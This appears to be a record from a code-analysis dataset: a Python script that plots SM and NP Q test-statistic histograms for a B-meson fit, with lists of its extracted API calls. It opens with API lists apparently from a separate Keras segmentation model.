[ "tensorflow.py_function", "tensorflow.keras.losses.binary_crossentropy", "tensorflow.keras.backend.sum", "efficientnet.tfkeras.EfficientNetB4", "tensorflow.keras.backend.flatten", "tensorflow.keras.layers.Conv2D", "tensorflow.keras.layers.BatchNormalization", "tensorflow.keras.layers.MaxPooling2D", "tensorflow.keras.layers.Dropout", "numpy.sum", "tensorflow.keras.models.Model", "tensorflow.keras.layers.LeakyReLU", "tensorflow.keras.layers.concatenate", "tensorflow.keras.layers.Activation", "tensorflow.keras.layers.Conv2DTranspose", "tensorflow.keras.layers.UpSampling2D", "tensorflow.keras.layers.Add" ]
[((1071, 1160), 'efficientnet.tfkeras.EfficientNetB4', 'EfficientNetB4', ([], {'weights': 'imagenet_weights', 'include_top': '(False)', 'input_shape': 'input_shape'}), '(weights=imagenet_weights, include_top=False, input_shape=\n input_shape)\n', (1085, 1160), False, 'from efficientnet.tfkeras import EfficientNetB4\n'), ((2198, 2240), 'tensorflow.keras.layers.concatenate', 'keras.layers.concatenate', (['[deconv4, conv4]'], {}), '([deconv4, conv4])\n', (2222, 2240), False, 'from tensorflow import keras\n'), ((2993, 3048), 'tensorflow.keras.layers.concatenate', 'keras.layers.concatenate', (['[deconv3, deconv4_up1, conv3]'], {}), '([deconv3, deconv4_up1, conv3])\n', (3017, 3048), False, 'from tensorflow import keras\n'), ((3674, 3742), 'tensorflow.keras.layers.concatenate', 'keras.layers.concatenate', (['[deconv2, deconv3_up1, deconv4_up2, conv2]'], {}), '([deconv2, deconv3_up1, deconv4_up2, conv2])\n', (3698, 3742), False, 'from tensorflow import keras\n'), ((4235, 4320), 'tensorflow.keras.layers.concatenate', 'keras.layers.concatenate', (['[deconv1, deconv2_up1, deconv3_up2, deconv4_up3, conv1]'], {}), '([deconv1, deconv2_up1, deconv3_up2, deconv4_up3,\n conv1])\n', (4259, 4320), False, 'from tensorflow import keras\n'), ((6217, 6270), 'tensorflow.keras.layers.concatenate', 'keras.layers.concatenate', (['[d1, d2, d3, d4, d5, input]'], {}), '([d1, d2, d3, d4, d5, input])\n', (6241, 6270), False, 'from tensorflow import keras\n'), ((6439, 6509), 'tensorflow.keras.models.Model', 'keras.models.Model', ([], {'inputs': 'input', 'outputs': '[d, d11, d22, d33, d44, d55]'}), '(inputs=input, outputs=[d, d11, d22, d33, d44, d55])\n', (6457, 6509), False, 'from tensorflow import keras\n'), ((7572, 7635), 'tensorflow.py_function', 'tf.py_function', (['get_iou_vector', '[label, pred > 0.5]', 'tf.float64'], {}), '(get_iou_vector, [label, pred > 0.5], tf.float64)\n', (7586, 7635), True, 'import tensorflow as tf\n'), ((7706, 7735), 'tensorflow.keras.backend.flatten', 'keras.backend.flatten', (['y_true'], {}), '(y_true)\n', (7727, 7735), False, 'from tensorflow import keras\n'), ((7752, 7781), 'tensorflow.keras.backend.flatten', 'keras.backend.flatten', (['y_pred'], {}), '(y_pred)\n', (7773, 7781), False, 'from tensorflow import keras\n'), ((352, 420), 'tensorflow.keras.layers.Conv2D', 'keras.layers.Conv2D', (['filters', 'size'], {'strides': 'strides', 'padding': 'padding'}), '(filters, size, strides=strides, padding=padding)\n', (371, 420), False, 'from tensorflow import keras\n'), ((433, 466), 'tensorflow.keras.layers.BatchNormalization', 'keras.layers.BatchNormalization', ([], {}), '()\n', (464, 466), False, 'from tensorflow import keras\n'), ((622, 655), 'tensorflow.keras.layers.LeakyReLU', 'keras.layers.LeakyReLU', ([], {'alpha': '(0.1)'}), '(alpha=0.1)\n', (644, 655), False, 'from tensorflow import keras\n'), ((677, 710), 'tensorflow.keras.layers.BatchNormalization', 'keras.layers.BatchNormalization', ([], {}), '()\n', (708, 710), False, 'from tensorflow import keras\n'), ((732, 765), 'tensorflow.keras.layers.BatchNormalization', 'keras.layers.BatchNormalization', ([], {}), '()\n', (763, 765), False, 'from tensorflow import keras\n'), ((906, 924), 'tensorflow.keras.layers.Add', 'keras.layers.Add', ([], {}), '()\n', (922, 924), False, 'from tensorflow import keras\n'), ((1261, 1294), 'tensorflow.keras.layers.LeakyReLU', 'keras.layers.LeakyReLU', ([], {'alpha': '(0.1)'}), '(alpha=0.1)\n', (1283, 1294), False, 'from tensorflow import keras\n'), ((1315, 1348), 'tensorflow.keras.layers.MaxPooling2D', 'keras.layers.MaxPooling2D', (['(2, 2)'], {}), '((2, 2))\n', (1340, 1348), False, 'from tensorflow import keras\n'), ((1369, 1403), 'tensorflow.keras.layers.Dropout', 'keras.layers.Dropout', (['dropout_rate'], {}), '(dropout_rate)\n', (1389, 1403), False, 'from tensorflow import keras\n'), ((1440, 1545), 'tensorflow.keras.layers.Conv2D', 'keras.layers.Conv2D', (['(start_neurons * 32)', '(3, 3)'], {'activation': 'None', 'padding': '"""same"""', 'name': '"""conv_middle"""'}), "(start_neurons * 32, (3, 3), activation=None, padding=\n 'same', name='conv_middle')\n", (1459, 1545), False, 'from tensorflow import keras\n'), ((1671, 1704), 'tensorflow.keras.layers.LeakyReLU', 'keras.layers.LeakyReLU', ([], {'alpha': '(0.1)'}), '(alpha=0.1)\n', (1693, 1704), False, 'from tensorflow import keras\n'), ((1729, 1821), 'tensorflow.keras.layers.Conv2DTranspose', 'keras.layers.Conv2DTranspose', (['(start_neurons * 16)', '(3, 3)'], {'strides': '(2, 2)', 'padding': '"""same"""'}), "(start_neurons * 16, (3, 3), strides=(2, 2),\n padding='same')\n", (1757, 1821), False, 'from tensorflow import keras\n'), ((1844, 1936), 'tensorflow.keras.layers.Conv2DTranspose', 'keras.layers.Conv2DTranspose', (['(start_neurons * 16)', '(3, 3)'], {'strides': '(2, 2)', 'padding': '"""same"""'}), "(start_neurons * 16, (3, 3), strides=(2, 2),\n padding='same')\n", (1872, 1936), False, 'from tensorflow import keras\n'), ((1961, 2053), 'tensorflow.keras.layers.Conv2DTranspose', 'keras.layers.Conv2DTranspose', (['(start_neurons * 16)', '(3, 3)'], {'strides': '(2, 2)', 'padding': '"""same"""'}), "(start_neurons * 16, (3, 3), strides=(2, 2),\n padding='same')\n", (1989, 2053), False, 'from tensorflow import keras\n'), ((2082, 2174), 'tensorflow.keras.layers.Conv2DTranspose', 'keras.layers.Conv2DTranspose', (['(start_neurons * 16)', '(3, 3)'], {'strides': '(2, 2)', 'padding': '"""same"""'}), "(start_neurons * 16, (3, 3), strides=(2, 2),\n padding='same')\n", (2110, 2174), False, 'from tensorflow import keras\n'), ((2255, 2289), 'tensorflow.keras.layers.Dropout', 'keras.layers.Dropout', (['dropout_rate'], {}), '(dropout_rate)\n', (2275, 2289), False, 'from tensorflow import keras\n'), ((2314, 2399), 'tensorflow.keras.layers.Conv2D', 'keras.layers.Conv2D', (['(start_neurons * 16)', '(3, 3)'], {'activation': 'None', 'padding': '"""same"""'}), "(start_neurons * 16, (3, 3), activation=None, padding='same'\n )\n", (2333, 2399), False, 'from tensorflow import keras\n'), ((2536, 2569), 'tensorflow.keras.layers.LeakyReLU', 'keras.layers.LeakyReLU', ([], {'alpha': '(0.1)'}), '(alpha=0.1)\n', (2558, 2569), False, 'from tensorflow import keras\n'), ((2606, 2697), 'tensorflow.keras.layers.Conv2DTranspose', 'keras.layers.Conv2DTranspose', (['(start_neurons * 8)', '(3, 3)'], {'strides': '(2, 2)', 'padding': '"""same"""'}), "(start_neurons * 8, (3, 3), strides=(2, 2),\n padding='same')\n", (2634, 2697), False, 'from tensorflow import keras\n'), ((2721, 2812), 'tensorflow.keras.layers.Conv2DTranspose', 'keras.layers.Conv2DTranspose', (['(start_neurons * 8)', '(3, 3)'], {'strides': '(2, 2)', 'padding': '"""same"""'}), "(start_neurons * 8, (3, 3), strides=(2, 2),\n padding='same')\n", (2749, 2812), False, 'from tensorflow import keras\n'), ((2837, 2928), 'tensorflow.keras.layers.Conv2DTranspose', 'keras.layers.Conv2DTranspose', (['(start_neurons * 8)', '(3, 3)'], {'strides': '(2, 2)', 'padding': '"""same"""'}), "(start_neurons * 8, (3, 3), strides=(2, 2),\n padding='same')\n", (2865, 2928), False, 'from tensorflow import keras\n'), ((3063, 3097), 'tensorflow.keras.layers.Dropout', 'keras.layers.Dropout', (['dropout_rate'], {}), '(dropout_rate)\n', (3083, 3097), False, 'from tensorflow import keras\n'), ((3122, 3201), 'tensorflow.keras.layers.Conv2D', 'keras.layers.Conv2D', (['(start_neurons * 8)', '(3, 3)'], {'activation': 'None', 'padding': '"""same"""'}), "(start_neurons * 8, (3, 3), activation=None, padding='same')\n", (3141, 3201), False, 'from tensorflow import keras\n'), ((3341, 3374), 'tensorflow.keras.layers.LeakyReLU', 'keras.layers.LeakyReLU', ([], {'alpha': '(0.1)'}), '(alpha=0.1)\n', (3363, 3374), False, 'from tensorflow import keras\n'), ((3400, 3491), 'tensorflow.keras.layers.Conv2DTranspose', 'keras.layers.Conv2DTranspose', (['(start_neurons * 4)', '(3, 3)'], {'strides': '(2, 2)', 'padding': '"""same"""'}), "(start_neurons * 4, (3, 3), strides=(2, 2),\n padding='same')\n", (3428, 3491), False, 'from tensorflow import keras\n'), ((3515, 3606), 'tensorflow.keras.layers.Conv2DTranspose', 'keras.layers.Conv2DTranspose', (['(start_neurons * 4)', '(3, 3)'], {'strides': '(2, 2)', 'padding': '"""same"""'}), "(start_neurons * 4, (3, 3), strides=(2, 2),\n padding='same')\n", (3543, 3606), False, 'from tensorflow import keras\n'), ((3759, 3784), 'tensorflow.keras.layers.Dropout', 'keras.layers.Dropout', (['(0.1)'], {}), '(0.1)\n', (3779, 3784), False, 'from tensorflow import keras\n'), ((3807, 3886), 'tensorflow.keras.layers.Conv2D', 'keras.layers.Conv2D', (['(start_neurons * 4)', '(3, 3)'], {'activation': 'None', 'padding': '"""same"""'}), "(start_neurons * 4, (3, 3), activation=None, padding='same')\n", (3826, 3886), False, 'from tensorflow import keras\n'), ((4026, 4059), 'tensorflow.keras.layers.LeakyReLU', 'keras.layers.LeakyReLU', ([], {'alpha': '(0.1)'}), '(alpha=0.1)\n', (4048, 4059), False, 'from tensorflow import keras\n'), ((4085, 4176), 'tensorflow.keras.layers.Conv2DTranspose', 'keras.layers.Conv2DTranspose', (['(start_neurons * 2)', '(3, 3)'], {'strides': '(2, 2)', 'padding': '"""same"""'}), "(start_neurons * 2, (3, 3), strides=(2, 2),\n padding='same')\n", (4113, 4176), False, 'from tensorflow import keras\n'), ((4333, 4358), 'tensorflow.keras.layers.Dropout', 'keras.layers.Dropout', (['(0.1)'], {}), '(0.1)\n', (4353, 4358), False, 'from tensorflow import keras\n'), ((4381, 4460), 'tensorflow.keras.layers.Conv2D', 'keras.layers.Conv2D', (['(start_neurons * 2)', '(3, 3)'], {'activation': 'None', 'padding': '"""same"""'}), "(start_neurons * 2, (3, 3), activation=None, padding='same')\n", (4400, 4460), False, 'from tensorflow import keras\n'), ((4600, 4633), 'tensorflow.keras.layers.LeakyReLU', 'keras.layers.LeakyReLU', ([], {'alpha': '(0.1)'}), '(alpha=0.1)\n', (4622, 4633), False, 'from tensorflow import keras\n'), ((4658, 4749), 'tensorflow.keras.layers.Conv2DTranspose', 'keras.layers.Conv2DTranspose', (['(start_neurons * 1)', '(3, 3)'], {'strides': '(2, 2)', 'padding': '"""same"""'}), "(start_neurons * 1, (3, 3), strides=(2, 2),\n padding='same')\n", (4686, 4749), False, 'from tensorflow import keras\n'), ((4768, 4793), 'tensorflow.keras.layers.Dropout', 'keras.layers.Dropout', (['(0.1)'], {}), '(0.1)\n', (4788, 4793), False, 'from tensorflow import keras\n'), ((4816, 4895), 'tensorflow.keras.layers.Conv2D', 'keras.layers.Conv2D', (['(start_neurons * 1)', '(3, 3)'], {'activation': 'None', 'padding': '"""same"""'}), "(start_neurons * 1, (3, 3), activation=None, padding='same')\n", (4835, 4895), False, 'from tensorflow import keras\n'), ((5035, 5068), 'tensorflow.keras.layers.LeakyReLU', 'keras.layers.LeakyReLU', ([], {'alpha': '(0.1)'}), '(alpha=0.1)\n', (5057, 5068), False, 'from tensorflow import keras\n'), ((5091, 5129), 'tensorflow.keras.layers.Dropout', 'keras.layers.Dropout', (['(dropout_rate / 2)'], {}), '(dropout_rate / 2)\n', (5111, 5129), False, 'from tensorflow import keras\n'), ((5148, 5186), 'tensorflow.keras.layers.UpSampling2D', 'keras.layers.UpSampling2D', ([], {'size': '(2, 2)'}), '(size=(2, 2))\n', (5173, 5186), False, 'from tensorflow import keras\n'), ((5204, 5283), 'tensorflow.keras.layers.Conv2D', 'keras.layers.Conv2D', (['(1)', '(3, 3)'], {'padding': '"""same"""', 'activation': 'None', 'use_bias': '(False)'}), "(1, (3, 3), padding='same', activation=None, use_bias=False)\n", (5223, 5283), False, 'from tensorflow import keras\n'), ((5297, 5342), 'tensorflow.keras.layers.Activation', 'keras.layers.Activation', (['"""sigmoid"""'], {'name': '"""d1"""'}), "('sigmoid', name='d1')\n", (5320, 5342), False, 'from tensorflow import keras\n'), ((5358, 5396), 'tensorflow.keras.layers.UpSampling2D', 'keras.layers.UpSampling2D', ([], {'size': '(4, 4)'}), '(size=(4, 4))\n', (5383, 5396), False, 'from tensorflow import keras\n'), ((5415, 5494), 'tensorflow.keras.layers.Conv2D', 'keras.layers.Conv2D', (['(1)', '(3, 3)'], {'padding': '"""same"""', 'activation': 'None', 'use_bias': '(False)'}), "(1, (3, 3), padding='same', activation=None, use_bias=False)\n", (5434, 5494), False, 'from tensorflow import keras\n'), ((5510, 5555), 'tensorflow.keras.layers.Activation', 'keras.layers.Activation', (['"""sigmoid"""'], {'name': '"""d2"""'}), "('sigmoid', name='d2')\n", (5533, 5555), False, 'from tensorflow import keras\n'), ((5572, 5610), 'tensorflow.keras.layers.UpSampling2D', 'keras.layers.UpSampling2D', ([], {'size': '(8, 8)'}), '(size=(8, 8))\n', (5597, 5610), False, 'from tensorflow import keras\n'), ((5629, 5708), 'tensorflow.keras.layers.Conv2D', 'keras.layers.Conv2D', (['(1)', '(3, 3)'], {'padding': '"""same"""', 'activation': 'None', 'use_bias': '(False)'}), "(1, (3, 3), padding='same', activation=None, use_bias=False)\n", (5648, 5708), False, 'from tensorflow import keras\n'), ((5724, 5769), 'tensorflow.keras.layers.Activation', 'keras.layers.Activation', (['"""sigmoid"""'], {'name': '"""d3"""'}), "('sigmoid', name='d3')\n", (5747, 5769), False, 'from tensorflow import keras\n'), ((5786, 5826), 'tensorflow.keras.layers.UpSampling2D', 'keras.layers.UpSampling2D', ([], {'size': '(16, 16)'}), '(size=(16, 16))\n', (5811, 5826), False, 'from tensorflow import keras\n'), ((5845, 5924), 'tensorflow.keras.layers.Conv2D', 'keras.layers.Conv2D', (['(1)', '(3, 3)'], {'padding': '"""same"""', 'activation': 'None', 'use_bias': '(False)'}), "(1, (3, 3), padding='same', activation=None, use_bias=False)\n", (5864, 5924), False, 'from tensorflow import keras\n'), ((5940, 5985), 'tensorflow.keras.layers.Activation', 'keras.layers.Activation', (['"""sigmoid"""'], {'name': '"""d4"""'}), "('sigmoid', name='d4')\n", (5963, 5985), False, 'from tensorflow import keras\n'), ((6002, 6042), 'tensorflow.keras.layers.UpSampling2D', 'keras.layers.UpSampling2D', ([], {'size': '(32, 32)'}), '(size=(32, 32))\n', (6027, 6042), False, 'from tensorflow import keras\n'), ((6061, 6140), 'tensorflow.keras.layers.Conv2D', 'keras.layers.Conv2D', (['(1)', '(3, 3)'], {'padding': '"""same"""', 'activation': 'None', 'use_bias': '(False)'}), "(1, (3, 3), padding='same', activation=None, use_bias=False)\n", (6080, 6140), False, 'from tensorflow import keras\n'), ((6156, 6201), 'tensorflow.keras.layers.Activation', 'keras.layers.Activation', (['"""sigmoid"""'], {'name': '"""d5"""'}), "('sigmoid', name='d5')\n", (6179, 6201), False, 'from tensorflow import keras\n'), ((6279, 6369), 'tensorflow.keras.layers.Conv2D', 'keras.layers.Conv2D', (['(1)'], {'kernel_size': '(3)', 'activation': 'None', 'padding': '"""same"""', 'use_bias': '(False)'}), "(1, kernel_size=3, activation=None, padding='same',\n use_bias=False)\n", (6298, 6369), False, 'from tensorflow import keras\n'), ((6378, 6422), 'tensorflow.keras.layers.Activation', 'keras.layers.Activation', (['"""sigmoid"""'], {'name': '"""d"""'}), "('sigmoid', name='d')\n", (6401, 6422), False, 'from tensorflow import keras\n'), ((6857, 6866), 'numpy.sum', 'np.sum', (['t'], {}), '(t)\n', (6863, 6866), True, 'import numpy as np\n'), ((6883, 6892), 'numpy.sum', 'np.sum', (['p'], {}), '(p)\n', (6889, 6892), True, 'import numpy as np\n'), ((7155, 7168), 'numpy.sum', 'np.sum', (['(t * p)'], {}), '(t * p)\n', (7161, 7168), True, 'import numpy as np\n'), ((8029, 8077), 'tensorflow.keras.losses.binary_crossentropy', 'keras.losses.binary_crossentropy', (['y_true', 'y_pred'], {}), '(y_true, y_pred)\n', (8061, 8077), False, 'from tensorflow import keras\n'), ((8159, 8207), 'tensorflow.keras.losses.binary_crossentropy', 'keras.losses.binary_crossentropy', (['y_true', 'y_pred'], {}), '(y_true, y_pred)\n', (8191, 8207), False, 'from tensorflow import keras\n'), ((511, 544), 'tensorflow.keras.layers.LeakyReLU', 'keras.layers.LeakyReLU', ([], {'alpha': '(0.1)'}), '(alpha=0.1)\n', (533, 544), False, 'from tensorflow import keras\n'), ((7841, 7872), 'tensorflow.keras.backend.sum', 'keras.backend.sum', (['intersection'], {}), '(intersection)\n', (7858, 7872), False, 'from tensorflow import keras\n'), ((7886, 7913), 'tensorflow.keras.backend.sum', 'keras.backend.sum', (['y_true_f'], {}), '(y_true_f)\n', (7903, 7913), False, 'from tensorflow import keras\n'), ((7916, 7943), 'tensorflow.keras.backend.sum', 'keras.backend.sum', (['y_pred_f'], {}), '(y_pred_f)\n', (7933, 7943), False, 'from tensorflow import keras\n')]
#!/usr/bin/env python """Plot Q test statistics""" import argparse import csv import math import matplotlib import numpy as np import shutil import tensorflow.compat.v2 as tf import b_meson_fit as bmf tf.enable_v2_behavior() def read_q_stats(csv_path): """Return list of Q stats from file""" q_list = [] with open(csv_path, newline='') as csv_file: reader = csv.DictReader(csv_file) for row in reader: q_list.append(float(row['q'])) return q_list def gaussian(x_list_, data): data_max = max(data) x = np.sum(x_list_ * data) / np.sum(data) width = np.sqrt(np.abs(np.sum((x_list_ - x) ** 2 * data) / np.sum(data))) return data_max * np.exp(-(x_list_ - x) ** 2 / (2 * width ** 2)) columns = shutil.get_terminal_size().columns parser = argparse.ArgumentParser( description='Plot Q test statistics.', formatter_class=lambda prog: argparse.HelpFormatter(prog, max_help_position=columns, width=columns), ) parser.add_argument( '-b', '--bins', dest='bins', type=int, default=100, help='Number of histogram bins (default: 100)', ) parser.add_argument( '-d', '--device', dest='device', default=bmf.Script.device_default, help='use this device e.g. CPU:0, GPU:0, GPU:1 (default: {})'.format(bmf.Script.device_default), ) parser.add_argument( '-w', '--write-svg', dest='write_svg', metavar='SVG_PATH', help='write plot as SVG using this filepath' ) parser.add_argument( dest='sm_filepath', metavar='SM_FILEPATH', help='Path to SM CSV file' ) parser.add_argument( dest='np_filepath', metavar='NP_FILEPATH', help='Path to NP CSV file' ) args = parser.parse_args() with bmf.Script(device=args.device) as script: if args.write_svg is not None: matplotlib.use('SVG') # Import these after we optionally set SVG backend - otherwise matplotlib may bail on a missing TK backend when # running from the CLI import matplotlib.pylab as plt import seaborn as sns # Load data sm_data = read_q_stats(args.sm_filepath) np_data = read_q_stats(args.np_filepath) # Max _/+ x-axis scale (Rounded up to nearest 25) combined_data = sm_data + np_data max_point = max(max(combined_data), -min(combined_data)) x_max = 25 * math.ceil(max_point / 25) # Histogram bins to use bins = np.linspace(-x_max, x_max, args.bins) # Bin midpoints for x-axis x_list = (bins[1:] + bins[:-1]) / 2 sm_hist = np.histogram(sm_data, bins=bins, density=True) np_hist = np.histogram(np_data, bins=bins, density=True) np_median = np.median(np_data) sm_gaussian = gaussian(x_list, sm_hist[0]) # Calculate sigma confidence level sm_mean = np.mean(sm_data) sm_stddev = np.std(sm_data) sigma_level = (sm_mean - np_median) / sm_stddev bmf.stdout('mean: {} stddev: {} sigma level: {}'.format(sm_mean, sm_stddev, sigma_level)) plt.figure() # Set style as well as font to Computer Modern Roman to match LaTeX output sns.set(style='ticks', font='cmr10', rc={'mathtext.fontset': 'cm', 'axes.unicode_minus': False}) # Blue open circles for SM data. Don't plot 0 values plt.scatter( x_list, [np.nan if x == 0 else x for x in sm_hist[0]], facecolors='none', edgecolors='b', s=15, label='SM' ) # Red closed circles for NP data. Don't plot 0 values plt.scatter(x_list, [np.nan if x == 0 else x for x in np_hist[0]], color='r', s=15, label='NP') # Blue solid line for SM Gaussian plt.plot(x_list, sm_gaussian, color='b', label='SM fit') # Red dashed line for NP median plt.gca().axvline(np_median, color='r', linestyle=':', label='NP median') # Calculate the y-min by finding the y-axis order of magnitude just before the NP median, rounding down, # and dropping 1 more order of magnitude x_idx_just_before_np_median = len(list(filter(lambda x: x < np_median, x_list))) - 1 gaussian_val_just_before_np_median = sm_gaussian[x_idx_just_before_np_median] val_mag_just_before_np_median = math.floor(math.log(gaussian_val_just_before_np_median, 10)) y_min = float('1e{}'.format(val_mag_just_before_np_median - 1)) # Calculate the y-max by finding the highest y-axis and rounding up to the next order of magnitude max_fraction = max(sm_hist[0] + np_hist[0]) max_fraction_mag = math.ceil(math.log(max_fraction, 10)) y_max = float('1e{}'.format(max_fraction_mag)) bmf.stdout('Setting x scale from {} to {}'.format(-x_max, x_max)) plt.xlim(-x_max, x_max) bmf.stdout('Setting y scale from {} to {}'.format(y_min, y_max)) plt.ylim(y_min, y_max) plt.xlabel('Q') plt.ylabel('Fraction / bin') plt.yscale('log') # Show legend in order NP, NP median, SM, SM fit handles, labels = plt.gca().get_legend_handles_labels() order = [3, 1, 2, 0] plt.legend([handles[idx] for idx in order], [labels[idx] for idx in order]) if args.write_svg is not None: filepath = args.write_svg bmf.stdout('Writing {}'.format(filepath)) plt.savefig(filepath, format='svg', bbox_inches='tight') else: plt.show()
[ "numpy.sum", "matplotlib.pylab.gca", "numpy.histogram", "numpy.mean", "numpy.exp", "matplotlib.pylab.figure", "matplotlib.pylab.show", "matplotlib.pylab.scatter", "matplotlib.pylab.legend", "numpy.std", "shutil.get_terminal_size", "argparse.HelpFormatter", "numpy.linspace", "math.log", "seaborn.set", "matplotlib.pylab.savefig", "math.ceil", "numpy.median", "csv.DictReader", "matplotlib.pylab.yscale", "matplotlib.pylab.plot", "matplotlib.use", "matplotlib.pylab.xlim", "matplotlib.pylab.ylim", "matplotlib.pylab.ylabel", "matplotlib.pylab.xlabel", "b_meson_fit.Script", "tensorflow.compat.v2.enable_v2_behavior" ]
[((203, 226), 'tensorflow.compat.v2.enable_v2_behavior', 'tf.enable_v2_behavior', ([], {}), '()\n', (224, 226), True, 'import tensorflow.compat.v2 as tf\n'), ((757, 783), 'shutil.get_terminal_size', 'shutil.get_terminal_size', ([], {}), '()\n', (781, 783), False, 'import shutil\n'), ((1722, 1752), 'b_meson_fit.Script', 'bmf.Script', ([], {'device': 'args.device'}), '(device=args.device)\n', (1732, 1752), True, 'import b_meson_fit as bmf\n'), ((2379, 2416), 'numpy.linspace', 'np.linspace', (['(-x_max)', 'x_max', 'args.bins'], {}), '(-x_max, x_max, args.bins)\n', (2390, 2416), True, 'import numpy as np\n'), ((2504, 2550), 'numpy.histogram', 'np.histogram', (['sm_data'], {'bins': 'bins', 'density': '(True)'}), '(sm_data, bins=bins, density=True)\n', (2516, 2550), True, 'import numpy as np\n'), ((2565, 2611), 'numpy.histogram', 'np.histogram', (['np_data'], {'bins': 'bins', 'density': '(True)'}), '(np_data, bins=bins, density=True)\n', (2577, 2611), True, 'import numpy as np\n'), ((2628, 2646), 'numpy.median', 'np.median', (['np_data'], {}), '(np_data)\n', (2637, 2646), True, 'import numpy as np\n'), ((2748, 2764), 'numpy.mean', 'np.mean', (['sm_data'], {}), '(sm_data)\n', (2755, 2764), True, 'import numpy as np\n'), ((2781, 2796), 'numpy.std', 'np.std', (['sm_data'], {}), '(sm_data)\n', (2787, 2796), True, 'import numpy as np\n'), ((2948, 2960), 'matplotlib.pylab.figure', 'plt.figure', ([], {}), '()\n', (2958, 2960), True, 'import matplotlib.pylab as plt\n'), ((3044, 3144), 'seaborn.set', 'sns.set', ([], {'style': '"""ticks"""', 'font': '"""cmr10"""', 'rc': "{'mathtext.fontset': 'cm', 'axes.unicode_minus': False}"}), "(style='ticks', font='cmr10', rc={'mathtext.fontset': 'cm',\n 'axes.unicode_minus': False})\n", (3051, 3144), True, 'import seaborn as sns\n'), ((3203, 3328), 'matplotlib.pylab.scatter', 'plt.scatter', (['x_list', '[(np.nan if x == 0 else x) for x in sm_hist[0]]'], {'facecolors': '"""none"""', 'edgecolors': '"""b"""', 's': '(15)', 'label': '"""SM"""'}), "(x_list, [(np.nan if x == 0 else x) for x in sm_hist[0]],\n facecolors='none', edgecolors='b', s=15, label='SM')\n", (3214, 3328), True, 'import matplotlib.pylab as plt\n'), ((3440, 3542), 'matplotlib.pylab.scatter', 'plt.scatter', (['x_list', '[(np.nan if x == 0 else x) for x in np_hist[0]]'], {'color': '"""r"""', 's': '(15)', 'label': '"""NP"""'}), "(x_list, [(np.nan if x == 0 else x) for x in np_hist[0]], color=\n 'r', s=15, label='NP')\n", (3451, 3542), True, 'import matplotlib.pylab as plt\n'), ((3579, 3635), 'matplotlib.pylab.plot', 'plt.plot', (['x_list', 'sm_gaussian'], {'color': '"""b"""', 'label': '"""SM fit"""'}), "(x_list, sm_gaussian, color='b', label='SM fit')\n", (3587, 3635), True, 'import matplotlib.pylab as plt\n'), ((4582, 4605), 'matplotlib.pylab.xlim', 'plt.xlim', (['(-x_max)', 'x_max'], {}), '(-x_max, x_max)\n', (4590, 4605), True, 'import matplotlib.pylab as plt\n'), ((4679, 4701), 'matplotlib.pylab.ylim', 'plt.ylim', (['y_min', 'y_max'], {}), '(y_min, y_max)\n', (4687, 4701), True, 'import matplotlib.pylab as plt\n'), ((4706, 4721), 'matplotlib.pylab.xlabel', 'plt.xlabel', (['"""Q"""'], {}), "('Q')\n", (4716, 4721), True, 'import matplotlib.pylab as plt\n'), ((4726, 4754), 'matplotlib.pylab.ylabel', 'plt.ylabel', (['"""Fraction / bin"""'], {}), "('Fraction / bin')\n", (4736, 4754), True, 'import matplotlib.pylab as plt\n'), ((4759, 4776), 'matplotlib.pylab.yscale', 'plt.yscale', (['"""log"""'], {}), "('log')\n", (4769, 4776), True, 'import matplotlib.pylab as plt\n'), ((4920, 4995), 'matplotlib.pylab.legend', 'plt.legend', (['[handles[idx] for idx in order]', '[labels[idx] for idx in order]'], {}), '([handles[idx] for idx in order], [labels[idx] for idx in order])\n', (4930, 4995), True, 'import matplotlib.pylab as plt\n'), ((382, 406), 'csv.DictReader', 'csv.DictReader', (['csv_file'], {}), '(csv_file)\n', (396, 406), False, 'import csv\n'), ((560, 582), 'numpy.sum', 'np.sum', (['(x_list_ * data)'], {}), '(x_list_ * data)\n', (566, 582), True, 'import numpy as np\n'), ((585, 597), 'numpy.sum', 'np.sum', (['data'], {}), '(data)\n', (591, 597), True, 'import numpy as np\n'), ((698, 744), 'numpy.exp', 'np.exp', (['(-(x_list_ - x) ** 2 / (2 * width ** 2))'], {}), '(-(x_list_ - x) ** 2 / (2 * width ** 2))\n', (704, 744), True, 'import numpy as np\n'), ((1807, 1828), 'matplotlib.use', 'matplotlib.use', (['"""SVG"""'], {}), "('SVG')\n", (1821, 1828), False, 'import matplotlib\n'), ((2313, 2338), 'math.ceil', 'math.ceil', (['(max_point / 25)'], {}), '(max_point / 25)\n', (2322, 2338), False, 'import math\n'), ((4125, 4173), 'math.log', 'math.log', (['gaussian_val_just_before_np_median', '(10)'], {}), '(gaussian_val_just_before_np_median, 10)\n', (4133, 4173), False, 'import math\n'), ((4428, 4454), 'math.log', 'math.log', (['max_fraction', '(10)'], {}), '(max_fraction, 10)\n', (4436, 4454), False, 'import math\n'), ((5124, 5180), 'matplotlib.pylab.savefig', 'plt.savefig', (['filepath'], {'format': '"""svg"""', 'bbox_inches': '"""tight"""'}), "(filepath, format='svg', bbox_inches='tight')\n", (5135, 5180), True, 'import matplotlib.pylab as plt\n'), ((5199, 5209), 'matplotlib.pylab.show', 'plt.show', ([], {}), '()\n', (5207, 5209), True, 'import matplotlib.pylab as plt\n'), ((902, 972), 'argparse.HelpFormatter', 'argparse.HelpFormatter', (['prog'], {'max_help_position': 'columns', 'width': 'columns'}), '(prog, max_help_position=columns, width=columns)\n', (924, 972), False, 'import argparse\n'), ((3677, 3686), 'matplotlib.pylab.gca', 'plt.gca', ([], {}), '()\n', (3684, 3686), True, 'import matplotlib.pylab as plt\n'), ((4853, 4862), 'matplotlib.pylab.gca', 'plt.gca', ([], {}), '()\n', (4860, 4862), True, 'import matplotlib.pylab as plt\n'), ((625, 658), 'numpy.sum', 'np.sum', (['((x_list_ - x) ** 2 * data)'], {}), '((x_list_ - x) ** 2 * data)\n', (631, 658), True, 'import numpy as np\n'), ((661, 673), 'numpy.sum', 'np.sum', (['data'], {}), '(data)\n', (667, 673), True, 'import numpy as np\n')]
